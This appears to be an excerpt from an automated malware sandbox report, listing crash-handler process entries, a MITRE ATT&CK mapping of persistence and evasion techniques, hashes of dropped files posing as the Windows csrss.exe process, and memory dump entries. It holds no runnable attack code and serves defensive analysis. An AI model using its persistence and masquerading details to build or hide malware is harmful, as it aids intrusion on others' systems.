C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2704 -ip 2704
1⤵
PID:3100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2704 -ip 2704
1⤵
PID:4940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2704 -ip 2704
1⤵
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2704 -ip 2704
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2704 -ip 2704
1⤵
PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2704 -ip 2704
1⤵
PID:1204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2704 -ip 2704
1⤵
PID:3476

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
3fe78f7695077a15ff90b11c0793c21f

SHA1
2fcbb4d51326ca0eafafad8ce757f6855f34ec55

SHA256
e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424

SHA512
1f5a3e19576db656ceea0468989d308831fa384ac13434d15642787806f7d838cbe95072dbd8c3e73947d320e5f98e40f920a6f496ce297287d60bb865f2c141

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.9MB

MD5
3fe78f7695077a15ff90b11c0793c21f

SHA1
2fcbb4d51326ca0eafafad8ce757f6855f34ec55

SHA256
e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424

SHA512
1f5a3e19576db656ceea0468989d308831fa384ac13434d15642787806f7d838cbe95072dbd8c3e73947d320e5f98e40f920a6f496ce297287d60bb865f2c141

Download Submit
memory/2596-149-0x0000000000000000-mapping.dmp

Download
memory/2704-147-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2704-153-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2704-142-0x0000000000000000-mapping.dmp

Download
memory/2704-146-0x0000000001400000-0x00000000017A8000-memory.dmp

Filesize
3.7MB

Download
memory/2764-139-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2764-137-0x0000000000FC7000-0x000000000136F000-memory.dmp

Filesize
3.7MB

Download
memory/2764-135-0x0000000000000000-mapping.dmp

Download
memory/2764-145-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2864-136-0x00000000012E0000-0x0000000001AE5000-memory.dmp

Filesize
8.0MB

Download
memory/2864-138-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/2864-133-0x00000000012E0000-0x0000000001AE5000-memory.dmp

Filesize
8.0MB

Download
memory/2864-132-0x0000000000F2D000-0x00000000012D5000-memory.dmp

Filesize
3.7MB

Download
memory/2864-134-0x0000000000400000-0x0000000000C1F000-memory.dmp

Filesize
8.1MB

Download
memory/3972-148-0x0000000000000000-mapping.dmp

Download
memory/4300-141-0x0000000000000000-mapping.dmp

Download
memory/4596-140-0x0000000000000000-mapping.dmp

Download
memory/4852-152-0x0000000000000000-mapping.dmp

Download
memory/4992-150-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads